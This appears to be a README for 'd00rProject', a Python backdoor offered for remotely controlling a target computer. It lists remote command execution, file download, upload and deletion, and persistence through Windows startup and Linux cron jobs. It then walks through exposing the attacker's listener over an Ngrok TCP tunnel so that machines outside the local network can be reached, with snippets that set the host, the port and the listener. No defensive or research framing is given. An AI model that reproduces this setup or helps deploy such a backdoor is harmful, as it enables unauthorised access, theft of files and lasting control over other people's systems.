This backdoor written in Python allows you to control a target system remotely. The backdoor provides various commands for executing system commands, navigating the file system, and managing files. It also has a persistence mechanism in case the target PC gets turned off.
- Remote execution of system commands
- Changing the working directory
- Listing files and directories
- Downloading files from the target system
- Uploading files to the target system
- Deleting files and directories
- Persistence (Windows startup and Linux cron job)
d00rProject works outside your local network, to do so you can set up a tunnel using Ngrok's TCP feature. Follow these steps:
Download and install Ngrok from
In a terminal, navigate to the directory where Ngrok is installed and run the following command to create a TCP tunnel:
ngrok tcp 1337
Then copy paste the tunnel address ngrok generated into
def main():
target = "HOST"
port = 1337
my_backdoor = Backdoor(target, port)
Set the correct port in the listener and execute.
my_listener = Listener("", 1337)